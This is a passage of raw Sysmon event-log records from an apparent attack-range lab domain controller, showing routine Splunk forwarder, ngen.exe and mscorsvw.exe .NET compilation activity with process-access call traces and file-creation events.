Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:49.874{59A5CD1D-9185-6005-B902-00000000A301}1512C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:56.983{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-918C-6005-BE02-00000000A301}1652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:56.983{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-918C-6005-BE02-00000000A301}1652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:56.920{59A5CD1D-918C-6005-BD02-00000000A301}4304C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\10d0-0\System.Web.ApplicationServices.dll2021-01-18 13:47:56.920 10341000x80000000000000006985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:56.874{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-918C-6005-BD02-00000000A301}4304C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:56.858{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-918C-6005-BD02-00000000A301}4304C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:56.858{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-918C-6005-BD02-00000000A301}4304C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:56.827{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-918C-6005-BC02-00000000A301}2896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:56.795{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-918C-6005-BC02-00000000A301}2896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:56.795{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-918C-6005-BC02-00000000A301}2896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:56.749{59A5CD1D-918C-6005-BB02-00000000A301}4264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\10a8-1\System.Web.Abstractions.dll2021-01-18 13:47:56.749 10341000x80000000000000006978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:56.717{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-918C-6005-BB02-00000000A301}4264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:56.717{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-918C-6005-BB02-00000000A301}4264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:56.717{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-918C-6005-BB02-00000000A301}4264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:56.608{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-918C-6005-BA02-00000000A301}3796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:56.592{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-918C-6005-BA02-00000000A301}3796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:56.592{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-918C-6005-BA02-00000000A301}3796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:56.202{59A5CD1D-9183-6005-B502-00000000A301}4656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1230-0\System.Web.dll2021-01-18 13:47:56.202 10341000x80000000000000006992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:57.264{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-918D-6005-BF02-00000000A301}4424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:57.248{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-918D-6005-BF02-00000000A301}4424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:57.248{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-918D-6005-BF02-00000000A301}4424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:57.030{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-918C-6005-BE02-00000000A301}1652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007006Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:00.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9190-6005-C302-00000000A301}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007005Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:00.858{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9190-6005-C302-00000000A301}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007004Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:00.858{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9190-6005-C302-00000000A301}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007003Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:00.686{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9190-6005-C202-00000000A301}1196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:00.686{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9190-6005-C202-00000000A301}1196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 